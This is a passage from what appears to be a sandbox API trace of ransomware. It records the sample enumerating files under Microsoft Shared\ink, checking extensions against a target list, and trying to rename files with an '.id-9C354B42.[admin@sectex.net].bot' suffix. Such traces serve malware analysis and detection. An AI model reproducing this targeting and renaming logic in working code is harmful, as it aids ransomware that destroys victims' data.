	[0035.991] GetFileSizeEx (in: hFile=0x1a8, lpFileSize=0x981ff1c | out: lpFileSize=0x981ff1c*=222208) returned 1
	[0035.991] CloseHandle (hObject=0x1a8) returned 1
	[0035.991] GetFileAttributesW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\en-US\\join.avi" (normalized: "c:\\program files\\common files\\microsoft shared\\ink\\en-us\\join.avi")) returned 0x20
	[0035.991] GetFileAttributesW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\en-US\\join.avi.id-9C354B42.[admin@sectex.net].bot" (normalized: "c:\\program files\\common files\\microsoft shared\\ink\\en-us\\join.avi.id-9c354b42.[admin@sectex.net].bot")) returned 0xffffffff
	[0035.991] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\en-US\\join.avi" (normalized: "c:\\program files\\common files\\microsoft shared\\ink\\en-us\\join.avi"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0xffffffff
	[0035.991] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\en-US\\join.avi") returned 65
	[0035.991] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\en-US\\join.avi") returned 65
	[0035.991] lstrlenW (lpString=".doc") returned 4
	[0035.991] lstrcmpiW (lpString1=".doc", lpString2=".avi") returned 1
	[0035.991] lstrlenW (lpString=".docx") returned 5
	[0035.992] lstrcmpiW (lpString1=".docx", lpString2="n.avi") returned -1
	[0035.992] lstrlenW (lpString=".pdf") returned 4
	[0035.992] lstrcmpiW (lpString1=".pdf", lpString2=".avi") returned 1
	[0035.992] lstrlenW (lpString=".xls") returned 4
	[0035.992] lstrcmpiW (lpString1=".xls", lpString2=".avi") returned 1
	[0035.992] lstrlenW (lpString=".xlsx") returned 5
	[0035.992] lstrcmpiW (lpString1=".xlsx", lpString2="n.avi") returned -1
	[0035.992] lstrlenW (lpString=".ppt") returned 4
	[0035.992] lstrcmpiW (lpString1=".ppt", lpString2=".avi") returned 1
	[0035.992] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\en-US\\join.avi") returned 65
	[0035.992] lstrlenW (lpString=".zip") returned 4
	[0035.992] lstrcmpiW (lpString1=".zip", lpString2=".avi") returned 1
	[0035.992] lstrlenW (lpString=".rar") returned 4
	[0035.992] lstrcmpiW (lpString1=".rar", lpString2=".avi") returned 1
	[0035.992] lstrlenW (lpString=".bz2") returned 4
	[0035.992] lstrcmpiW (lpString1=".bz2", lpString2=".avi") returned 1
	[0035.992] lstrlenW (lpString=".7z") returned 3
	[0035.992] lstrcmpiW (lpString1=".7z", lpString2="avi") returned -1
	[0035.992] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\en-US\\join.avi") returned 65
	[0035.992] lstrlenW (lpString=".dbf") returned 4
	[0035.992] lstrcmpiW (lpString1=".dbf", lpString2=".avi") returned 1
	[0035.992] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\en-US\\join.avi") returned 65
	[0035.992] lstrlenW (lpString=".1cd") returned 4
	[0035.992] lstrcmpiW (lpString1=".1cd", lpString2=".avi") returned -1
	[0035.992] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\en-US\\join.avi") returned 65
	[0035.992] lstrlenW (lpString=".jpg") returned 4
	[0035.992] lstrcmpiW (lpString1=".jpg", lpString2=".avi") returned 1
	[0035.992] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\en-US\\join.avi") returned 65
	[0035.992] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\en-US\\join.avi") returned 65
	[0035.992] lstrlenW (lpString=".doc") returned 4
	[0035.992] lstrcmpiW (lpString1=".doc", lpString2=".avi") returned 1
	[0035.992] lstrlenW (lpString=".docx") returned 5
	[0035.992] lstrcmpiW (lpString1=".docx", lpString2="n.avi") returned -1
	[0035.992] lstrlenW (lpString=".pdf") returned 4
	[0035.993] lstrcmpiW (lpString1=".pdf", lpString2=".avi") returned 1
	[0035.993] lstrlenW (lpString=".xls") returned 4
	[0035.993] lstrcmpiW (lpString1=".xls", lpString2=".avi") returned 1
	[0035.993] lstrlenW (lpString=".xlsx") returned 5
	[0035.993] lstrcmpiW (lpString1=".xlsx", lpString2="n.avi") returned -1
	[0035.993] lstrlenW (lpString=".ppt") returned 4
	[0035.993] lstrcmpiW (lpString1=".ppt", lpString2=".avi") returned 1
	[0035.993] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\en-US\\join.avi") returned 65
	[0035.993] lstrlenW (lpString=".zip") returned 4
	[0035.993] lstrcmpiW (lpString1=".zip", lpString2=".avi") returned 1
	[0035.993] lstrlenW (lpString=".rar") returned 4
	[0035.993] lstrcmpiW (lpString1=".rar", lpString2=".avi") returned 1
	[0035.993] lstrlenW (lpString=".bz2") returned 4
	[0035.993] lstrcmpiW (lpString1=".bz2", lpString2=".avi") returned 1
	[0035.993] lstrlenW (lpString=".7z") returned 3
	[0035.993] lstrcmpiW (lpString1=".7z", lpString2="avi") returned -1
	[0035.993] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\en-US\\join.avi") returned 65
	[0035.993] lstrlenW (lpString=".dbf") returned 4
	[0035.993] lstrcmpiW (lpString1=".dbf", lpString2=".avi") returned 1
	[0035.993] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\en-US\\join.avi") returned 65
	[0035.993] lstrlenW (lpString=".1cd") returned 4
	[0035.993] lstrcmpiW (lpString1=".1cd", lpString2=".avi") returned -1
	[0035.993] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\en-US\\join.avi") returned 65
	[0035.993] lstrlenW (lpString=".jpg") returned 4
	[0035.993] lstrcmpiW (lpString1=".jpg", lpString2=".avi") returned 1
	[0035.993] lstrcmpiW (lpString1=".avi", lpString2=".bot") returned -1
	[0035.993] lstrlenW (lpString="split.avi") returned 9
	[0035.993] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\en-US\\split.avi" (normalized: "c:\\program files\\common files\\microsoft shared\\ink\\en-us\\split.avi"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x1a8
	[0035.994] GetFileSizeEx (in: hFile=0x1a8, lpFileSize=0x981ff1c | out: lpFileSize=0x981ff1c*=194048) returned 1
	[0035.994] CloseHandle (hObject=0x1a8) returned 1
	[0035.994] GetFileAttributesW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\en-US\\split.avi" (normalized: "c:\\program files\\common files\\microsoft shared\\ink\\en-us\\split.avi")) returned 0x20
	[0035.994] GetFileAttributesW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\en-US\\split.avi.id-9C354B42.[admin@sectex.net].bot" (normalized: "c:\\program files\\common files\\microsoft shared\\ink\\en-us\\split.avi.id-9c354b42.[admin@sectex.net].bot")) returned 0xffffffff
	[0035.994] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\en-US\\split.avi" (normalized: "c:\\program files\\common files\\microsoft shared\\ink\\en-us\\split.avi"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0xffffffff
	[0035.994] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\en-US\\split.avi") returned 66
	[0035.994] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\en-US\\split.avi") returned 66
	[0035.994] lstrlenW (lpString=".doc") returned 4
	[0035.994] lstrcmpiW (lpString1=".doc", lpString2=".avi") returned 1
	[0035.994] lstrlenW (lpString=".docx") returned 5
	[0035.994] lstrcmpiW (lpString1=".docx", lpString2="t.avi") returned -1
	[0035.994] lstrlenW (lpString=".pdf") returned 4
	[0035.994] lstrcmpiW (lpString1=".pdf", lpString2=".avi") returned 1
	[0035.994] lstrlenW (lpString=".xls") returned 4
	[0035.994] lstrcmpiW (lpString1=".xls", lpString2=".avi") returned 1
	[0035.994] lstrlenW (lpString=".xlsx") returned 5
	[0035.994] lstrcmpiW (lpString1=".xlsx", lpString2="t.avi") returned -1
	[0035.994] lstrlenW (lpString=".ppt") returned 4
	[0035.994] lstrcmpiW (lpString1=".ppt", lpString2=".avi") returned 1
	[0035.994] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\en-US\\split.avi") returned 66
	[0035.994] lstrlenW (lpString=".zip") returned 4
	[0035.994] lstrcmpiW (lpString1=".zip", lpString2=".avi") returned 1
	[0035.994] lstrlenW (lpString=".rar") returned 4
	[0035.994] lstrcmpiW (lpString1=".rar", lpString2=".avi") returned 1
	[0035.994] lstrlenW (lpString=".bz2") returned 4
	[0035.995] lstrcmpiW (lpString1=".bz2", lpString2=".avi") returned 1
	[0035.995] lstrlenW (lpString=".7z") returned 3
	[0035.995] lstrcmpiW (lpString1=".7z", lpString2="avi") returned -1
	[0035.995] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\en-US\\split.avi") returned 66
	[0035.995] lstrlenW (lpString=".dbf") returned 4
	[0035.995] lstrcmpiW (lpString1=".dbf", lpString2=".avi") returned 1
	[0035.995] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\en-US\\split.avi") returned 66
	[0035.995] lstrlenW (lpString=".1cd") returned 4
	[0035.995] lstrcmpiW (lpString1=".1cd", lpString2=".avi") returned -1
	[0035.995] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\en-US\\split.avi") returned 66
	[0035.995] lstrlenW (lpString=".jpg") returned 4
	[0035.995] lstrcmpiW (lpString1=".jpg", lpString2=".avi") returned 1
	[0035.995] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\en-US\\split.avi") returned 66
	[0035.995] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\en-US\\split.avi") returned 66
	[0035.995] lstrlenW (lpString=".doc") returned 4
	[0035.995] lstrcmpiW (lpString1=".doc", lpString2=".avi") returned 1
	[0035.995] lstrlenW (lpString=".docx") returned 5
	[0035.995] lstrcmpiW (lpString1=".docx", lpString2="t.avi") returned -1
	[0035.995] lstrlenW (lpString=".pdf") returned 4
	[0035.995] lstrcmpiW (lpString1=".pdf", lpString2=".avi") returned 1
	[0035.995] lstrlenW (lpString=".xls") returned 4
	[0035.995] lstrcmpiW (lpString1=".xls", lpString2=".avi") returned 1
	[0035.995] lstrlenW (lpString=".xlsx") returned 5
	[0035.995] lstrcmpiW (lpString1=".xlsx", lpString2="t.avi") returned -1
	[0035.995] lstrlenW (lpString=".ppt") returned 4
	[0035.995] lstrcmpiW (lpString1=".ppt", lpString2=".avi") returned 1
	[0035.995] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\en-US\\split.avi") returned 66
	[0035.995] lstrlenW (lpString=".zip") returned 4
	[0035.995] lstrcmpiW (lpString1=".zip", lpString2=".avi") returned 1
	[0035.995] lstrlenW (lpString=".rar") returned 4
	[0035.995] lstrcmpiW (lpString1=".rar", lpString2=".avi") returned 1
	[0035.995] lstrlenW (lpString=".bz2") returned 4
	[0035.995] lstrcmpiW (lpString1=".bz2", lpString2=".avi") returned 1
	[0035.995] lstrlenW (lpString=".7z") returned 3
	[0035.996] lstrcmpiW (lpString1=".7z", lpString2="avi") returned -1
	[0035.996] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\en-US\\split.avi") returned 66
	[0035.996] lstrlenW (lpString=".dbf") returned 4
	[0035.996] lstrcmpiW (lpString1=".dbf", lpString2=".avi") returned 1
	[0035.996] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\en-US\\split.avi") returned 66
	[0035.996] lstrlenW (lpString=".1cd") returned 4
	[0035.996] lstrcmpiW (lpString1=".1cd", lpString2=".avi") returned -1
	[0035.996] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\en-US\\split.avi") returned 66
	[0035.996] lstrlenW (lpString=".jpg") returned 4
	[0035.996] lstrcmpiW (lpString1=".jpg", lpString2=".avi") returned 1
	[0035.996] lstrcmpiW (lpString1=".avi", lpString2=".bot") returned -1
	[0035.996] lstrlenW (lpString="FlickAnimation.avi") returned 18
	[0035.996] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\FlickAnimation.avi" (normalized: "c:\\program files\\common files\\microsoft shared\\ink\\flickanimation.avi"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x1a8
	[0035.996] GetFileSizeEx (in: hFile=0x1a8, lpFileSize=0x981ff1c | out: lpFileSize=0x981ff1c*=1600388) returned 1
	[0035.996] CloseHandle (hObject=0x1a8) returned 1
	[0035.997] GetFileAttributesW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\FlickAnimation.avi" (normalized: "c:\\program files\\common files\\microsoft shared\\ink\\flickanimation.avi")) returned 0x20
	[0035.997] GetFileAttributesW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\FlickAnimation.avi.id-9C354B42.[admin@sectex.net].bot" (normalized: "c:\\program files\\common files\\microsoft shared\\ink\\flickanimation.avi.id-9c354b42.[admin@sectex.net].bot")) returned 0xffffffff
	[0035.997] MoveFileW (lpExistingFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\FlickAnimation.avi" (normalized: "c:\\program files\\common files\\microsoft shared\\ink\\flickanimation.avi"), lpNewFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\FlickAnimation.avi.id-9C354B42.[admin@sectex.net].bot" (normalized: "c:\\program files\\common files\\microsoft shared\\ink\\flickanimation.avi.id-9c354b42.[admin@sectex.net].bot")) returned 0
	[0035.997] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\FlickAnimation.avi") returned 69
	[0035.997] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\FlickAnimation.avi") returned 69
	[0035.997] lstrlenW (lpString=".doc") returned 4
	[0035.997] lstrcmpiW (lpString1=".doc", lpString2=".avi") returned 1
	[0035.997] lstrlenW (lpString=".docx") returned 5
	[0035.997] lstrcmpiW (lpString1=".docx", lpString2="n.avi") returned -1
	[0035.997] lstrlenW (lpString=".pdf") returned 4
	[0035.997] lstrcmpiW (lpString1=".pdf", lpString2=".avi") returned 1
	[0035.997] lstrlenW (lpString=".xls") returned 4
	[0035.997] lstrcmpiW (lpString1=".xls", lpString2=".avi") returned 1
	[0035.997] lstrlenW (lpString=".xlsx") returned 5
	[0035.997] lstrcmpiW (lpString1=".xlsx", lpString2="n.avi") returned -1
	[0035.997] lstrlenW (lpString=".ppt") returned 4
	[0035.997] lstrcmpiW (lpString1=".ppt", lpString2=".avi") returned 1
	[0035.997] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\FlickAnimation.avi") returned 69
	[0035.997] lstrlenW (lpString=".zip") returned 4
	[0035.997] lstrcmpiW (lpString1=".zip", lpString2=".avi") returned 1
	[0035.997] lstrlenW (lpString=".rar") returned 4
	[0035.997] lstrcmpiW (lpString1=".rar", lpString2=".avi") returned 1
	[0035.997] lstrlenW (lpString=".bz2") returned 4
	[0035.997] lstrcmpiW (lpString1=".bz2", lpString2=".avi") returned 1
	[0035.997] lstrlenW (lpString=".7z") returned 3
	[0035.997] lstrcmpiW (lpString1=".7z", lpString2="avi") returned -1
	[0035.997] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\FlickAnimation.avi") returned 69
	[0035.997] lstrlenW (lpString=".dbf") returned 4
	[0035.997] lstrcmpiW (lpString1=".dbf", lpString2=".avi") returned 1
	[0035.998] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\FlickAnimation.avi") returned 69
	[0035.998] lstrlenW (lpString=".1cd") returned 4
	[0035.998] lstrcmpiW (lpString1=".1cd", lpString2=".avi") returned -1
	[0035.998] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\FlickAnimation.avi") returned 69
	[0035.998] lstrlenW (lpString=".jpg") returned 4
	[0035.998] lstrcmpiW (lpString1=".jpg", lpString2=".avi") returned 1
	[0035.998] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\FlickAnimation.avi") returned 69
	[0035.998] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\FlickAnimation.avi") returned 69
	[0035.998] lstrlenW (lpString=".doc") returned 4
	[0035.998] lstrcmpiW (lpString1=".doc", lpString2=".avi") returned 1
	[0035.998] lstrlenW (lpString=".docx") returned 5
	[0035.998] lstrcmpiW (lpString1=".docx", lpString2="n.avi") returned -1
	[0035.998] lstrlenW (lpString=".pdf") returned 4
	[0035.998] lstrcmpiW (lpString1=".pdf", lpString2=".avi") returned 1
	[0035.998] lstrlenW (lpString=".xls") returned 4
	[0035.998] lstrcmpiW (lpString1=".xls", lpString2=".avi") returned 1
	[0035.998] lstrlenW (lpString=".xlsx") returned 5
	[0035.998] lstrcmpiW (lpString1=".xlsx", lpString2="n.avi") returned -1
	[0035.998] lstrlenW (lpString=".ppt") returned 4
	[0035.998] lstrcmpiW (lpString1=".ppt", lpString2=".avi") returned 1
	[0035.998] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\FlickAnimation.avi") returned 69
	[0035.998] lstrlenW (lpString=".zip") returned 4
	[0035.998] lstrcmpiW (lpString1=".zip", lpString2=".avi") returned 1
	[0035.998] lstrlenW (lpString=".rar") returned 4
	[0035.998] lstrcmpiW (lpString1=".rar", lpString2=".avi") returned 1
	[0035.998] lstrlenW (lpString=".bz2") returned 4
	[0035.998] lstrcmpiW (lpString1=".bz2", lpString2=".avi") returned 1
	[0035.998] lstrlenW (lpString=".7z") returned 3
	[0035.998] lstrcmpiW (lpString1=".7z", lpString2="avi") returned -1
	[0035.998] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\FlickAnimation.avi") returned 69
	[0035.998] lstrlenW (lpString=".dbf") returned 4
	[0035.998] lstrcmpiW (lpString1=".dbf", lpString2=".avi") returned 1
	[0035.998] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\FlickAnimation.avi") returned 69
	[0035.998] lstrlenW (lpString=".1cd") returned 4
	[0035.998] lstrcmpiW (lpString1=".1cd", lpString2=".avi") returned -1
	[0035.999] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\FlickAnimation.avi") returned 69
	[0035.999] lstrlenW (lpString=".jpg") returned 4
	[0035.999] lstrcmpiW (lpString1=".jpg", lpString2=".avi") returned 1
	[0035.999] lstrcmpiW (lpString1=".xml", lpString2=".bot") returned 1
	[0035.999] lstrlenW (lpString="auxbase.xml") returned 11
	[0035.999] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\fsdefinitions\\auxpad\\auxbase.xml" (normalized: "c:\\program files\\common files\\microsoft shared\\ink\\fsdefinitions\\auxpad\\auxbase.xml"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x190
	[0036.000] GetFileSizeEx (in: hFile=0x190, lpFileSize=0x981ff1c | out: lpFileSize=0x981ff1c*=1434) returned 1
	[0036.000] CloseHandle (hObject=0x190) returned 1
	[0036.000] GetFileAttributesW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\fsdefinitions\\auxpad\\auxbase.xml" (normalized: "c:\\program files\\common files\\microsoft shared\\ink\\fsdefinitions\\auxpad\\auxbase.xml")) returned 0x20
	[0036.000] GetFileAttributesW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\fsdefinitions\\auxpad\\auxbase.xml.id-9C354B42.[admin@sectex.net].bot" (normalized: "c:\\program files\\common files\\microsoft shared\\ink\\fsdefinitions\\auxpad\\auxbase.xml.id-9c354b42.[admin@sectex.net].bot")) returned 0xffffffff
	[0036.000] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\fsdefinitions\\auxpad\\auxbase.xml" (normalized: "c:\\program files\\common files\\microsoft shared\\ink\\fsdefinitions\\auxpad\\auxbase.xml"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0xffffffff
	[0036.000] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\fsdefinitions\\auxpad\\auxbase.xml") returned 83
	[0036.000] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\fsdefinitions\\auxpad\\auxbase.xml") returned 83
	[0036.000] lstrlenW (lpString=".doc") returned 4
	[0036.000] lstrcmpiW (lpString1=".doc", lpString2=".xml") returned -1
	[0036.000] lstrlenW (lpString=".docx") returned 5
	[0036.000] lstrcmpiW (lpString1=".docx", lpString2="e.xml") returned -1
	[0036.000] lstrlenW (lpString=".pdf") returned 4
	[0036.000] lstrcmpiW (lpString1=".pdf", lpString2=".xml") returned -1
	[0036.000] lstrlenW (lpString=".xls") returned 4
	[0036.000] lstrcmpiW (lpString1=".xls", lpString2=".xml") returned -1
	[0036.000] lstrlenW (lpString=".xlsx") returned 5
	[0036.000] lstrcmpiW (lpString1=".xlsx", lpString2="e.xml") returned -1
	[0036.000] lstrlenW (lpString=".ppt") returned 4
	[0036.000] lstrcmpiW (lpString1=".ppt", lpString2=".xml") returned -1
	[0036.000] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\fsdefinitions\\auxpad\\auxbase.xml") returned 83
	[0036.000] lstrlenW (lpString=".zip") returned 4
	[0036.001] lstrcmpiW (lpString1=".zip", lpString2=".xml") returned 1
	[0036.001] lstrlenW (lpString=".rar") returned 4
	[0036.001] lstrcmpiW (lpString1=".rar", lpString2=".xml") returned -1
	[0036.001] lstrlenW (lpString=".bz2") returned 4
	[0036.001] lstrcmpiW (lpString1=".bz2", lpString2=".xml") returned -1
	[0036.001] lstrlenW (lpString=".7z") returned 3
	[0036.001] lstrcmpiW (lpString1=".7z", lpString2="xml") returned -1
	[0036.001] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\fsdefinitions\\auxpad\\auxbase.xml") returned 83
	[0036.001] lstrlenW (lpString=".dbf") returned 4
	[0036.001] lstrcmpiW (lpString1=".dbf", lpString2=".xml") returned -1
	[0036.001] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\fsdefinitions\\auxpad\\auxbase.xml") returned 83
	[0036.001] lstrlenW (lpString=".1cd") returned 4
	[0036.001] lstrcmpiW (lpString1=".1cd", lpString2=".xml") returned -1
	[0036.001] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\fsdefinitions\\auxpad\\auxbase.xml") returned 83
	[0036.001] lstrlenW (lpString=".jpg") returned 4
	[0036.001] lstrcmpiW (lpString1=".jpg", lpString2=".xml") returned -1
	[0036.001] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\fsdefinitions\\auxpad\\auxbase.xml") returned 83
	[0036.001] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\fsdefinitions\\auxpad\\auxbase.xml") returned 83
	[0036.001] lstrlenW (lpString=".doc") returned 4
	[0036.001] lstrcmpiW (lpString1=".doc", lpString2=".xml") returned -1
	[0036.001] lstrlenW (lpString=".docx") returned 5
	[0036.001] lstrcmpiW (lpString1=".docx", lpString2="e.xml") returned -1
	[0036.001] lstrlenW (lpString=".pdf") returned 4
	[0036.001] lstrcmpiW (lpString1=".pdf", lpString2=".xml") returned -1
	[0036.001] lstrlenW (lpString=".xls") returned 4
	[0036.001] lstrcmpiW (lpString1=".xls", lpString2=".xml") returned -1
	[0036.001] lstrlenW (lpString=".xlsx") returned 5
	[0036.001] lstrcmpiW (lpString1=".xlsx", lpString2="e.xml") returned -1
	[0036.001] lstrlenW (lpString=".ppt") returned 4
	[0036.001] lstrcmpiW (lpString1=".ppt", lpString2=".xml") returned -1
	[0036.001] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\fsdefinitions\\auxpad\\auxbase.xml") returned 83
	[0036.001] lstrlenW (lpString=".zip") returned 4
	[0036.001] lstrcmpiW (lpString1=".zip", lpString2=".xml") returned 1
	[0036.002] lstrlenW (lpString=".rar") returned 4
	[0036.002] lstrcmpiW (lpString1=".rar", lpString2=".xml") returned -1
	[0036.002] lstrlenW (lpString=".bz2") returned 4
	[0036.002] lstrcmpiW (lpString1=".bz2", lpString2=".xml") returned -1
	[0036.002] lstrlenW (lpString=".7z") returned 3
	[0036.002] lstrcmpiW (lpString1=".7z", lpString2="xml") returned -1
	[0036.002] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\fsdefinitions\\auxpad\\auxbase.xml") returned 83
	[0036.002] lstrlenW (lpString=".dbf") returned 4
	[0036.002] lstrcmpiW (lpString1=".dbf", lpString2=".xml") returned -1
	[0036.002] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\fsdefinitions\\auxpad\\auxbase.xml") returned 83
	[0036.002] lstrlenW (lpString=".1cd") returned 4
	[0036.002] lstrcmpiW (lpString1=".1cd", lpString2=".xml") returned -1
	[0036.002] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\fsdefinitions\\auxpad\\auxbase.xml") returned 83
	[0036.002] lstrlenW (lpString=".jpg") returned 4
	[0036.002] lstrcmpiW (lpString1=".jpg", lpString2=".xml") returned -1
	[0036.002] lstrcmpiW (lpString1=".xml", lpString2=".bot") returned 1
	[0036.002] lstrlenW (lpString="auxpad.xml") returned 10
	[0036.002] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\fsdefinitions\\auxpad.xml" (normalized: "c:\\program files\\common files\\microsoft shared\\ink\\fsdefinitions\\auxpad.xml"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x190
	[0036.004] GetFileSizeEx (in: hFile=0x190, lpFileSize=0x981ff1c | out: lpFileSize=0x981ff1c*=212) returned 1
	[0036.004] CloseHandle (hObject=0x190) returned 1
	[0036.004] GetFileAttributesW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\fsdefinitions\\auxpad.xml" (normalized: "c:\\program files\\common files\\microsoft shared\\ink\\fsdefinitions\\auxpad.xml")) returned 0x20
	[0036.004] GetFileAttributesW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\fsdefinitions\\auxpad.xml.id-9C354B42.[admin@sectex.net].bot" (normalized: "c:\\program files\\common files\\microsoft shared\\ink\\fsdefinitions\\auxpad.xml.id-9c354b42.[admin@sectex.net].bot")) returned 0xffffffff
	[0036.004] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\fsdefinitions\\auxpad.xml" (normalized: "c:\\program files\\common files\\microsoft shared\\ink\\fsdefinitions\\auxpad.xml"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0xffffffff
	[0036.004] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\fsdefinitions\\auxpad.xml") returned 75
	[0036.004] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\fsdefinitions\\auxpad.xml") returned 75
	[0036.004] lstrlenW (lpString=".doc") returned 4
	[0036.004] lstrcmpiW (lpString1=".doc", lpString2=".xml") returned -1
	[0036.004] lstrlenW (lpString=".docx") returned 5
	[0036.004] lstrcmpiW (lpString1=".docx", lpString2="d.xml") returned -1
	[0036.004] lstrlenW (lpString=".pdf") returned 4
	[0036.004] lstrcmpiW (lpString1=".pdf", lpString2=".xml") returned -1
	[0036.004] lstrlenW (lpString=".xls") returned 4
	[0036.004] lstrcmpiW (lpString1=".xls", lpString2=".xml") returned -1
	[0036.005] lstrlenW (lpString=".xlsx") returned 5
	[0036.005] lstrcmpiW (lpString1=".xlsx", lpString2="d.xml") returned -1
	[0036.005] lstrlenW (lpString=".ppt") returned 4
	[0036.005] lstrcmpiW (lpString1=".ppt", lpString2=".xml") returned -1
	[0036.005] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\fsdefinitions\\auxpad.xml") returned 75
	[0036.005] lstrlenW (lpString=".zip") returned 4
	[0036.005] lstrcmpiW (lpString1=".zip", lpString2=".xml") returned 1
	[0036.005] lstrlenW (lpString=".rar") returned 4
